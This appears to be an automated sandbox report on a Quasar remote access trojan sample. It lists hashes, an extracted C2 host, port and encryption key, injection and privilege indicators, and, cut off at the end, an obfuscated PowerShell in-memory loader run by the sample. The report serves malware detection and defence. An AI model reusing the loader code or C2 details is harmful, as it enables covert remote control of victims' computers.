quasar | 3798ed2ce7d93b63c0e5670d610809c6b73ddf556968b58446ae8b62c027354c

Analysis

max time kernel
300s
max time network
266s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
14-05-2024 20:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Uni.bat
Size

513KB
MD5

2f2f86a8f6be8fa6b37bd49bcd660a75
SHA1

f7006941a8cbf7a663e9fa379f75ccd5afedd730
SHA256

3798ed2ce7d93b63c0e5670d610809c6b73ddf556968b58446ae8b62c027354c
SHA512

5f253dd977ff725bab54ddd45bcdbd213587b55a376446a9db2c68bc097e97ad7a61019156449f65e329b9b51f8de3dfa077aa093787fc037d1c5c92252334fb
SSDEEP

12288:CnVOnWW4/Qczes8bGOvfKS2k3+0RVNN0VVjKgGt:CnVOno/QcN8bG4fKHkBRVn4KR

Score

10^/10

quasar slave execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-AidubAN29rBfWYM23w

Attributes

encryption_key
GNF1G2eu7MrbS69M7a4f
install_name
Client.exe
log_directory
$SXR-LOGS
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4324-202-0x00000000092F0000-0x000000000935C000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description pid process target process

PID 1368 created 568 1368 powershell.EXE winlogon.exe
PID 4124 created 568 4124 powershell.EXE winlogon.exe
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exe

flow pid process

2 4324 powershell.exe
5 4324 powershell.exe
7 4324 powershell.exe
11 4324 powershell.exe
14 4324 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2776 powershell.exe
4324 powershell.exe
4112 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

install.exeinstall.exe

pid process

4080 install.exe
1212 install.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

8 raw.githubusercontent.com
11 raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com

description	pid	process	target process
PID 1368 created 568	1368	powershell.EXE	winlogon.exe
PID 4124 created 568	4124	powershell.EXE	winlogon.exe

flow	pid	process
2	4324	powershell.exe
5	4324	powershell.exe
7	4324	powershell.exe
11	4324	powershell.exe
14	4324	powershell.exe

pid	process
2776	powershell.exe
4324	powershell.exe
4112	powershell.exe

pid	process
4080	install.exe
1212	install.exe

flow	ioc
8	raw.githubusercontent.com
11	raw.githubusercontent.com

flow	ioc
1	ip-api.com

Drops file in System32 directory 6 IoCs

Processes:

powershell.EXEsvchost.exepowershell.EXEOfficeClickToRun.exesvchost.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\$77svc64	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx	svchost.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description	pid	process	target process
PID 1368 set thread context of 4132	1368	powershell.EXE	dllhost.exe
PID 4124 set thread context of 4476	4124	powershell.EXE	dllhost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEOfficeClickToRun.exepowershell.EXEsvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 14 May 2024 20:30:59 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715718658"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={5C975315-6E6E-4678-90C6-041CE3BF21B9}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings powershell.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1304 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings	powershell.exe

pid	process
1304	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEdllhost.exe

pid	process
4112	powershell.exe
4112	powershell.exe
4112	powershell.exe
2776	powershell.exe
2776	powershell.exe
2776	powershell.exe
4324	powershell.exe
4324	powershell.exe
4324	powershell.exe
1368	powershell.EXE
1368	powershell.EXE
1368	powershell.EXE
1368	powershell.EXE
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe
4132	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4112	powershell.exe
Token: SeDebugPrivilege	2776	powershell.exe
Token: SeIncreaseQuotaPrivilege	2776	powershell.exe
Token: SeSecurityPrivilege	2776	powershell.exe
Token: SeTakeOwnershipPrivilege	2776	powershell.exe
Token: SeLoadDriverPrivilege	2776	powershell.exe
Token: SeSystemProfilePrivilege	2776	powershell.exe
Token: SeSystemtimePrivilege	2776	powershell.exe
Token: SeProfSingleProcessPrivilege	2776	powershell.exe
Token: SeIncBasePriorityPrivilege	2776	powershell.exe
Token: SeCreatePagefilePrivilege	2776	powershell.exe
Token: SeBackupPrivilege	2776	powershell.exe
Token: SeRestorePrivilege	2776	powershell.exe
Token: SeShutdownPrivilege	2776	powershell.exe
Token: SeDebugPrivilege	2776	powershell.exe
Token: SeSystemEnvironmentPrivilege	2776	powershell.exe
Token: SeRemoteShutdownPrivilege	2776	powershell.exe
Token: SeUndockPrivilege	2776	powershell.exe
Token: SeManageVolumePrivilege	2776	powershell.exe
Token: 33	2776	powershell.exe
Token: 34	2776	powershell.exe
Token: 35	2776	powershell.exe
Token: 36	2776	powershell.exe
Token: SeIncreaseQuotaPrivilege	2776	powershell.exe
Token: SeSecurityPrivilege	2776	powershell.exe
Token: SeTakeOwnershipPrivilege	2776	powershell.exe
Token: SeLoadDriverPrivilege	2776	powershell.exe
Token: SeSystemProfilePrivilege	2776	powershell.exe
Token: SeSystemtimePrivilege	2776	powershell.exe
Token: SeProfSingleProcessPrivilege	2776	powershell.exe
Token: SeIncBasePriorityPrivilege	2776	powershell.exe
Token: SeCreatePagefilePrivilege	2776	powershell.exe
Token: SeBackupPrivilege	2776	powershell.exe
Token: SeRestorePrivilege	2776	powershell.exe
Token: SeShutdownPrivilege	2776	powershell.exe
Token: SeDebugPrivilege	2776	powershell.exe
Token: SeSystemEnvironmentPrivilege	2776	powershell.exe
Token: SeRemoteShutdownPrivilege	2776	powershell.exe
Token: SeUndockPrivilege	2776	powershell.exe
Token: SeManageVolumePrivilege	2776	powershell.exe
Token: 33	2776	powershell.exe
Token: 34	2776	powershell.exe
Token: 35	2776	powershell.exe
Token: 36	2776	powershell.exe
Token: SeIncreaseQuotaPrivilege	2776	powershell.exe
Token: SeSecurityPrivilege	2776	powershell.exe
Token: SeTakeOwnershipPrivilege	2776	powershell.exe
Token: SeLoadDriverPrivilege	2776	powershell.exe
Token: SeSystemProfilePrivilege	2776	powershell.exe
Token: SeSystemtimePrivilege	2776	powershell.exe
Token: SeProfSingleProcessPrivilege	2776	powershell.exe
Token: SeIncBasePriorityPrivilege	2776	powershell.exe
Token: SeCreatePagefilePrivilege	2776	powershell.exe
Token: SeBackupPrivilege	2776	powershell.exe
Token: SeRestorePrivilege	2776	powershell.exe
Token: SeShutdownPrivilege	2776	powershell.exe
Token: SeDebugPrivilege	2776	powershell.exe
Token: SeSystemEnvironmentPrivilege	2776	powershell.exe
Token: SeRemoteShutdownPrivilege	2776	powershell.exe
Token: SeUndockPrivilege	2776	powershell.exe
Token: SeManageVolumePrivilege	2776	powershell.exe
Token: 33	2776	powershell.exe
Token: 34	2776	powershell.exe
Token: 35	2776	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

powershell.exe

pid process

4324 powershell.exe

pid	process
4324	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exepowershell.EXEdllhost.exe

description	pid	process	target process
PID 4864 wrote to memory of 4112	4864	cmd.exe	powershell.exe
PID 4864 wrote to memory of 4112	4864	cmd.exe	powershell.exe
PID 4864 wrote to memory of 4112	4864	cmd.exe	powershell.exe
PID 4112 wrote to memory of 2776	4112	powershell.exe	powershell.exe
PID 4112 wrote to memory of 2776	4112	powershell.exe	powershell.exe
PID 4112 wrote to memory of 2776	4112	powershell.exe	powershell.exe
PID 4112 wrote to memory of 2888	4112	powershell.exe	WScript.exe
PID 4112 wrote to memory of 2888	4112	powershell.exe	WScript.exe
PID 4112 wrote to memory of 2888	4112	powershell.exe	WScript.exe
PID 2888 wrote to memory of 3688	2888	WScript.exe	cmd.exe
PID 2888 wrote to memory of 3688	2888	WScript.exe	cmd.exe
PID 2888 wrote to memory of 3688	2888	WScript.exe	cmd.exe
PID 3688 wrote to memory of 4324	3688	cmd.exe	powershell.exe
PID 3688 wrote to memory of 4324	3688	cmd.exe	powershell.exe
PID 3688 wrote to memory of 4324	3688	cmd.exe	powershell.exe
PID 4324 wrote to memory of 4080	4324	powershell.exe	install.exe
PID 4324 wrote to memory of 4080	4324	powershell.exe	install.exe
PID 4324 wrote to memory of 4080	4324	powershell.exe	install.exe
PID 1368 wrote to memory of 4132	1368	powershell.EXE	dllhost.exe
PID 1368 wrote to memory of 4132	1368	powershell.EXE	dllhost.exe
PID 1368 wrote to memory of 4132	1368	powershell.EXE	dllhost.exe
PID 1368 wrote to memory of 4132	1368	powershell.EXE	dllhost.exe
PID 1368 wrote to memory of 4132	1368	powershell.EXE	dllhost.exe
PID 1368 wrote to memory of 4132	1368	powershell.EXE	dllhost.exe
PID 1368 wrote to memory of 4132	1368	powershell.EXE	dllhost.exe
PID 1368 wrote to memory of 4132	1368	powershell.EXE	dllhost.exe
PID 4132 wrote to memory of 568	4132	dllhost.exe	winlogon.exe
PID 4132 wrote to memory of 632	4132	dllhost.exe	lsass.exe
PID 4132 wrote to memory of 732	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 888	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 984	4132	dllhost.exe	dwm.exe
PID 4132 wrote to memory of 60	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 364	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 1028	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 1064	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 1076	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 1088	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 1188	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 1248	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 1320	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 1360	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 1372	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 1508	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 1520	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 1556	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 1600	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 1692	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 1740	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 1808	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 1816	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 1920	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 1936	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 2004	4132	dllhost.exe	spoolsv.exe
PID 4132 wrote to memory of 1784	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 2176	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 2196	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 2244	4132	dllhost.exe	sysmon.exe
PID 4132 wrote to memory of 2280	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 2312	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 2332	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 2348	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 2372	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 2488	4132	dllhost.exe	svchost.exe
PID 4132 wrote to memory of 2812	4132	dllhost.exe	svchost.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:568

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:984

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{7b04586b-0595-4ee4-b02d-476514391df9}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4132

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{741dc270-332c-4673-b69f-b8718db67d19}
2⤵
PID:4476

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:632

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:732

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:888

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:60

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:364

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
- Drops file in System32 directory
PID:1028

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1064

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:3128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zIfUlAkdVGXT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$knWnDvEyBBViEM,[Parameter(Position=1)][Type]$tTjiLTosod)$AkLTrdQxZaL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+'l'+[Char](101)+'c'+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+'eg'+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+'e'+''+'m'+'or'+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+'e'+'l'+'e'+'g'+'at'+[Char](101)+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'','C'+[Char](108)+'as'+[Char](115)+','+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+''+[Char](83)+''+'e'+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+','+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'A'+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$AkLTrdQxZaL.DefineConstructor('R'+'T'+''+[Char](83)+'p'+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+'lNa'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+'id'+[Char](101)+'B'+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$knWnDvEyBBViEM).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+'d');$AkLTrdQxZaL.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,'+'H'+''+'i'+''+'d'+''+'e'+'By'+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+'l'+''+[Char](111)+''+[Char](116)+','+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$tTjiLTosod,$knWnDvEyBBViEM).SetImplementationFlags('R'+'u'+'n'+[Char](116)+''+[Char](105)+'m'+'e'+''+','+'Ma'+[Char](110)+''+[Char](97)+''+'g'+'ed');Write-Output $AkLTrdQxZaL.CreateType();}$EjAgIoPUrELWW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+'e'+[Char](109)+'.d'+[Char](108)+'l')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+'t.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+'U'+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+'t'+'i'+'v'+''+'e'+''+[Char](77)+''+'e'+''+[Char](116)+'h'+'o'+''+'d'+''+[Char](115)+'');$dMMVYewsLtEYbp=$EjAgIoPUrELWW.GetMethod('G'+[Char](101)+''+'t'+'P'+[Char](114)+''+[Char](111)+'cA'+'d'+''+[Char](100)+'r'+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+'bl'+'i'+''+[Char](99)+''+','+''+'S'+''+[Char](116)+''+'a'+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$yfBXOHKWkoWGBzfdffq=zIfUlAkdVGXT @([String])([IntPtr]);$RaeZbwVqtkFYQrOVVPQdkS=zIfUlAkdVGXT 